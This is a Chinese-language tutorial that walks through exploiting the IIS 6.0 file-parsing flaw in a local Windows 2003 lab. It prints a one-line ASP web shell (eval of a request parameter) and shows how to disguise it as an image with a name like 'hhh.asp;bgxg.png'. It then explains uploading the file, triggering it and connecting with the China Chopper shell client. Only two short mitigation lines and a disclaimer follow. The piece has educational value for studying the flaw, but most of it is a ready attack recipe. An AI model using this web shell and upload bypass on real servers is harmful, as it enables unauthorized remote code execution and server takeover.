Web安全 中间件之 IIS 解析漏洞(利用一个图片 拿到服务器最高权限.)
中间件的概括:
中间件是指提供 系统软件 和 应用软件 之间连接的软件,以便于软件各部件之间的 沟通,特别是应用软件对于系统软件的集中的逻辑,在现代信息技术应用框架(比如:Web服务、面向服务的体系结构等中应用比较广泛.)
目录:
中间件的概括:
Web常见的中间件:
识别 中间件 方式.(这里我用的 火狐浏览器 安装的工具.)
IIS6.0 服务器的设置.(这里我使用的是默认的网站.)
(1)先在网站的根目录下,创建一个文件.
(2)设置网站 默认页面.
(3)添加 访问权限.
(4)允许 Web 服务扩展.
(5)访问网站 http://127.0.0.1 或者是 网站计算机的地址.
IIS6.0 中间件的漏洞步骤:
(1)制作 木马文件.
(2)把文件命名为 *.asp;*.png 图片格式( 比如:hhh.asp;bgxg.png ),然后上传到服务器.
(3)访问 图片的地址.(因为 IIS6.0 中间件有解析漏洞,所有图片里面的代码被执行了.)
(4)用菜刀进行连接.(图片的木马)
IIS6.0 文件解析漏洞修复方案.
(1)阻止上传 *.asp;*.jpg类型的文件名.
(2)做好权限设置,限制用户创建文件夹.
免责声明:
严禁利用本文章中所提到的工具和技术进行非法攻击,否则后果自负,上传者不承担任何责任。
Web常见的中间件:
(1)IIS (2)Apache (3)Nginx (4)Tomcat (5)JBoss (6)Weblogic
虚拟机下载:
win 2003 链接:https://pan.baidu.com/s/1z236X0shvHMHPY6jqSvwpQ
提取码:tian
识别 中间件 方式.(这里我用的 火狐浏览器 安装的工具.)
IIS6.0 服务器的设置.(这里我使用的是默认的网站.)
(1)先在网站的根目录下,创建一个文件.
(2)设置网站 默认页面.
(3)添加 访问权限.
(4)允许 Web 服务扩展.
(5)访问网站 http://127.0.0.1 或者是 网站计算机的地址.
IIS6.0 中间件的漏洞步骤:
(1)制作 木马文件.
<%eval request("bgxg")%>
(2)把文件命名为 *.asp;*.png 图片格式( 比如:hhh.asp;bgxg.png ),然后上传到服务器.
(3)访问 图片的地址.(因为 IIS6.0 中间件有解析漏洞,所有图片里面的代码被执行了.)
(4)用菜刀进行连接.(图片的木马)
IIS6.0 文件解析漏洞修复方案.
(1)阻止上传 *.asp;*.jpg类型的文件名.
(2)做好权限设置,限制用户创建文件夹.
参考链接:IIS,tomcat中间件简单漏洞利用实验_哔哩哔哩_bilibili
本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!